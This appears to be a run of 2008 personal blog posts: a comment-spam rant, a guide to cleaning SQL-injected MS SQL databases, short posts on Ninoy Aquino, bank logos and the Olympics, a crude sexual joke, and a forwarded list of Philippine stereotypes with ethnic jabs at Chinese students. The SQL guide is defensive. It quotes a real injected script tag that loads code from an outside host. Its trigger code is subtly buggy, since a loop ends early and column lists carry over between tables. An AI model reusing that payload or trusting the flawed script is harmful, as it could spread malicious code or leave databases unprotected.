We all know people like to comment on blogs for SEO purposes. Whenever I read an article that has a comment box in it, I almost automatically think of writing a comment to show some love and get a nice little link back to my website. Of course by default these are NOFOLLOW links, but they are links just the same and help advertise your website. Whenever I do that, I would always try to write something witty. I usually find myself checking out a person’s blog if I find his comment witty or interesting, as opposed to the 298,349,834 other variations of the “nice post, thanks!” crap, which serve no purpose than to pollute the internet with more spammage.

Take for example the five most recent comments on my blog. I know Gnob is Bong and is commenting just to get some link back love. At least he took 10 seconds to type something interesting and contributory, as opposed to the last 2 comments which are basically no brainers you can cut and paste into every damn blog post you can find.

That is why I usually mark these comments as spam. Good riddance!

/end rant

Share This

Had my hands full these past 2 months trying to fix SQL injected websites. It looks like this is the result of a recent string of attacks by Chinese hackers primarily exploiting websites running on ASP Classic with Microsoft SQL Server as the back-end database. Some of my sites had small amounts of data, which can be very easily cleaned up by hand. However, others can be quite huge and impossibly difficult for a brute force solution, that an automated script is necessary to fix the problem. After asking around one of my friends e-mailed me this. It gives no credit to the original source so if this is yours, please e-mail me so that I can give due credit.

Automatically clean up a database infected by SQL injection:

BEGIN
DECLARE @tblTable varchar(255), @colColumnName varchar(255), @Cmd NVARCHAR(4000)
DECLARE curSQLinjectionDataClean CURSOR FOR
SELECT a.name, b.name
FROM sysobjects a, syscolumns b
WHERE a.id = b.id AND a.xtype = ‘u’ AND
(b.xtype = 99 OR
b.xtype = 35 OR
b.xtype = 231 OR
b.xtype = 167)
OPEN curSQLinjectionDataClean
FETCH NEXT FROM curSQLinjectionDataClean INTO @tblTable, @colColumnName
WHILE (@@FETCH_STATUS = 0)
BEGIN
SET @Cmd = ‘UPDATE [’ + @tblTable + ‘] SET [’ + @colColumnName + ‘] = LEFT([’ + @colColumnName + ‘], LEN([’ + @colColumnName + ‘]) - 69)
WHERE [’+ @colColumnName + ‘] like ”%“></title><script src=”http://www3.800mg.cn/csrss/w.js”></script><!–”’
exec sp_executesql @Cmd
FETCH NEXT FROM curSQLinjectionDataClean INTO @tblTable, @colColumnName
END
CLOSE curSQLinjectionDataClean
DEALLOCATE curSQLinjectionDataClean
END

Replace “></title><script src=”http://www3.800mg.cn/csrss/w.js”></script><!– with the string that was injected. Note that this only clean records that are victims of SQL string injection.

To prevent future SQL injection:

BEGIN
DECLARE @tblInjectedTable TABLE (colTableName varchar(255))
DECLARE @tblInjectedColumn TABLE (colRecordID INT IDENTITY(1,1), colColumnName varchar(255))
DECLARE @tblTable varchar(255), @colColumnName varchar(255), @Cmd NVARCHAR(4000), @iCount SMALLINT, @iCountTo SMALLINT, @WhereCmd NVARCHAR(4000)
INSERT INTO @tblInjectedTable(colTableName)
SELECT DISTINCT a.name
FROM sysobjects a, syscolumns b
WHERE a.id = b.id AND a.xtype = ‘u’ AND b.length>99 AND
(b.xtype = 99 OR
b.xtype = 35 OR
b.xtype = 231 OR
b.xtype = 167)
DECLARE curSQLInjectedTable CURSOR FOR
SELECT colTableName
FROM @tblInjectedTable
OPEN curSQLInjectedTable
FETCH NEXT FROM curSQLInjectedTable INTO @tblTable
WHILE (@@FETCH_STATUS = 0)
BEGIN
SET @iCount = 2
INSERT INTO @tblInjectedColumn(colColumnName)
SELECT DISTINCT b.name
FROM sysobjects a, syscolumns b
WHERE a.id = b.id AND a.name = @tblTable AND a.xtype = ‘u’ AND b.length>99 AND
(b.xtype = 99 OR
b.xtype = 35 OR
b.xtype = 231 OR
b.xtype = 167)
SELECT @iCountTo = COUNT(*) FROM @tblInjectedColumn
SELECT @colColumnName = colColumnName FROM @tblInjectedColumn WHERE colRecordID = 1
SET @WhereCmd = ‘WHERE ins.[’ + @colColumnName + ‘] LIKE ”%<script%”’
WHILE @iCount <= @iCountTo
BEGIN
SELECT @colColumnName = colColumnName FROM @tblInjectedColumn WHERE colRecordID = @iCount
SET @WhereCmd = @WhereCmd + ‘OR ins.[’ + @colColumnName + ‘] LIKE ”%<script%”’
SET @iCount = @iCountTo + 1
END
SET @Cmd = ‘CREATE TRIGGER t’ + @tblTable + ‘ ON [’ + @tblTable + ‘] FOR INSERT, UPDATE AS
BEGIN DECLARE @iCount BIGINT SET @iCount = 0 SELECT @iCount = COUNT(*) FROM inserted ins ‘
+ @WhereCmd + ‘ IF @iCount > 0 ROLLBACK TRANSACTION END’
exec sp_executesql @Cmd
FETCH NEXT FROM curSQLInjectedTable INTO @tblTable
END
CLOSE curSQLInjectedTable
DEALLOCATE curSQLInjectedTable
END

This is all very easy to do. It took me less than two minutes to copy and paste the two code blocks above, make changes to the first one, and execute on MS SQL. Of course, I tested this first on a backup copy just in case. When trying out something unfamiliar for the first time, always make a backup copy!

Update (09/19/2008): attaching a downloadable version of the cleanup script. Get it here!

Share This

Taken from the iamninoy website:

Twenty-five years ago, a man named Ninoy Aquino fought
nobly for a cause he believed in. He was a man who believed
in heroism, in justice, in freedom, and he committed his life
to upholding these values in a manner he thought would be
for the greater good.

This man Ninoy lived bravely. And in his conviction and courage,
he died a hero.

(more…)

Share This

It seems like a lot of Philippine banks are into rebranding lately, in a Web 2.0-ish fashion. There’s UCPB, BDO, UnionBank, Metrobank and now Bank of the Philippine Islands or BPI.

The rebranding, in my opinion, is a success. They managed to make the font look up-to-date without loosing the class of the old logo.

Lately I’m really loving the font they used. It is very modern and sleek. The problem is, I don’t know the name of the font. Whoever correctly identifies the font wins a cookie.

Share This

Ever been in one of those days where you desperately needed a vagina and none could be found? Now you can actually make your own and carry it anywhere you want!

Pornogami FTW.

Share This

Five days after the opening of the 2008 Olympics in Beijing, the Philippines is still at the bottom of the pit with a grand total of 0 medals! This is a HUGE improvement over the 2004 Olympics in Athens where we managed to bag 9 medals (2 silvers and 7 bronze)! I feel ecstatic already.

When an office mate of mine told me that whoever gets the first gold medal in the 2008 Olympics was going to get 5 million pesos, a house and lot, and a car, I thought hey, that’s a good thing. No problem, right? Now all we have to do is get that gold medal.

Image and statistics courtesy of Yahoo!

Share This

Kom In I Garderoben is cool a Swedish site that will automatically generate an MTV-like video from any music file. The site is preloaded with a bunch of sample tunes, but you can actually upload your own MP3 file and watch as the video plays to its beat.

It’s very neat stuff, though it gets boring after a few minutes of repetition. I’m not really sure what this site is all about though, I wish I could understand Swedish

Share This

Got this in my mailbox today entitled “Prospective living in the Philippines”. Some truly hit home while some are mere exaggerations. You be the judge.

1. Every street has a basketball court.
2. Even doctors, lawyers and engineers are unemployed.
3. Doctors study to become nurses for employment abroad.
4. Students pay more money than they will earn afterwards.
5. School is considered the second home and the mall considered the third.
6. Call-center employees earn more money than teachers and nurses.
7. Everyone has his personal ghost story and superstition.
8. Mountains like Makiling and Banahaw are considered holy places.
9. Everything can be forged.
10. All kinds of animals are edible.
11. Starbucks coffee is more  expensive than gas.
12. Driving 4 kms can take as much as four hours.
13. Flyovers bring you from the freeway to the side streets.
14. Crossing the street involves running for your dear life.
15. The personal computer is mainly used for games and Friendster.
16. Where colonial mentality is dishonestly denied!
17. Where 4 a.m. is not even considered bedtime yet.
18. People can pay to defy the law.
19. Everything and everyone is spoofed.
20. Where even the poverty-stricken get to wear Ralph Lauren and Tommy Hilfiger (peke)!
21. The honking of car horns is a way of life.
22. Being called a bum is never offensive.
23. Floodwaters take up more than 90 percent of the streets during the rainy season.
24. Where everyone has a relative abroad who keeps  them alive.
25. Where wearing your national colors make you baduy.
26. Where even the poverty-stricken have the latest cell phones. (GSM-galing sa magnanakaw)
27. Where insurance does not work.
28. Where water can only be classified as tap and dirty.
29. Clean water is for sale (35 pesos per gallon).
30. Where the government makes the people pray for miracles. (Amen to that!)
31. Where University of the Philippines is where all the weird people go.
32. Ateneo is where all the nerds go.
33. La Salle is where all the Chinese go.
34. College of Saint Benilde is where all the stupid Chinese go and;
35. University of Asia and the Pacific is where all the irrelevantly rich people go.
36. Fast food is a diet meal.
37. Traffic signs are merely suggestions, not regulations.
38. Where being mugged is normal and It happens to everyone.
39. Rodents are normal house pets.
40. The definition of traffic is the ‘non-movement’ of vehicles.
41. Where the fighter planes of the 1940s are used for military engagements, and;
42. The new fighter planes are displayed in museums.
43. Where cigarettes and alcohol are a necessity, and where the lottery is a commodity.
44. Where soap operas tell the realities of life and where the news provides the drama.
45. Where actors make the rules and where politicians provide the entertainment.
46. People can get away with stealing trillions of pesos but not a thousand.
47. Where being an hour late is still considered punctual (Grabe talaga ‘to!)
48. Where the squatters have more to complain (even if they do not pay their tax) - than those employed and have their tax automatically deducted from their salaries.
49. And where everyone wants to leave the country!

(more…)

Share This